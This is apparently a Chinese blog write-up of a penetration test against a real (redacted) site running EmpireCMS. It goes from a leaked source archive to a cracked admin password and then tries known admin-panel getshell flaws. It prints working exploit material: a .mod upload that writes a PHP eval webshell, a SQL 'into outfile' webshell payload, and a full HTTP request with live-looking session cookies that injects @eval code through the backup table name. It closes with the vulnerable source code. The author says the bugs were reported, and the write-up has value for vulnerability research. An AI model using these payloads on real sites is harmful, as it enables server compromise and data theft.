源码泄露到getshell(2)

前言

文章所述漏洞已经提交至漏洞平台，且所有恶意操作均已复原

源码泄露

http://www.xxx.com.cn/www.zip

老规矩拿到源码先通关关键词找敏感信息

key
pwd
passwd
password

找到了半天居然找不到一个有效的密码

最后在robots.txt中看到CMS的信息-EmpireCMS

查询知道是开源cms后，直接百度查询数据表结构

知道了管理员记录表为phome_enewsuser,在源码里全局搜索

敏感信息泄露

点击进去得到管理员用户名，密码hash和盐值

直接解md5得到口令

Kite/kite

得到口令后就是找到后台地址，由于是开源的百度一下就有了
看一眼目录并没有修改后台地址，所以直接访问

http://www.xxx.com.cn/e/admin/

得到具体的版本号为6.6

历史漏洞

登录到后台后，因为是开源CMS，历史漏洞才是渗透的关键

直接搜索empireCMS漏洞，开始复现历史漏洞

1.后台-模版-公共模版-js调用登陆模版getshell

还没有开始就已经结束

Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist

好家伙，这是把表都删了吗

2.后台数据表与系统模型-导入数据库模型getshell

EmpireCMS 7.5以及之前版本中的e/class/moddofun.php文件的LoadInMod函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。

在本地先新建一个test.php.mod文件，内容为

<?php file_put_contents("lyy.php","<?php @eval(\$_POST['lyy']); ?>");?>

填入任意表名然后选择马上导入

又是一个表不存在，GG

3.后台备份与恢复数据-执行sql语句getshell

EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。

也就是后台提供了一个sql语句执行

只要服务器mysql配置secure_file_priv 不当，就可以向服务器写入文件

Payload

select '<?php @eval($_POST[123])?>' into outfile '绝对路径/e/admin/lyy.php'

因为要向站点写入文件，所以必须知道绝对路径才行。

因为是无回显执行，也不能通过show mysql变量获取部分路径，所以也pass了

show variables like '%datadir%';

4.后台备份与恢复数据-备份数据getshell

empirecms 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。

选择任意一个表，开始备份抓包

将tablename字段改为payload

@eval($_POST[123])

请求包

POST /e/admin/ebak/phome.php HTTP/1.1
Host: www.xxx.com.cn
Content-Length: 285
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xxx.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bxubwecmsdodbdata=empirecms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirecmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwloginecmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630
Connection: close

phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename%5B%5D=@eval($_POST[123])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD

回显得到备份文件夹名

hdm1010482_db_20211229152350

webshell连接备份文件夹下的config.php

http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php

成功getshell

原理分析

因为手里有源码，就跟了一下这个漏洞

首先定位

直接全局搜索config.php就找到了

在e/admin/ebak/class/functions.php文件中Ebak_DoEbak存在文件写入操作

$string="<?php
    \$b_table=\"".$b_table."\";
    ".$d_table."
    \$b_baktype=".$add['baktype'].";
    \$b_filesize=".$add['filesize'].";
    \$b_bakline=".$add['bakline'].";
    \$b_autoauf=".$add['autoauf'].";
    \$b_dbname=\"".$dbname."\";
    \$b_stru=".$bakstru.";
    \$b_strufour=".$bakstrufour.";
    \$b_dbchar=\"".addslashes($add['dbchar'])."\";
    \$b_beover=".$beover.";
    \$b_insertf=\"".addslashes($insertf)."\";
    \$b_autofield=\",".addslashes($add['autofield']).",\";
    \$b_bakdatatype=".$bakdatatype.";
    ?>";
    $cfile=$bakpath."/".$add['mypath']."/config.php";
    WriteFiletext_n($cfile,$string);

------本页内容已结束，喜欢请分享------

感谢您的来访，获取更多精彩文章请收藏本站。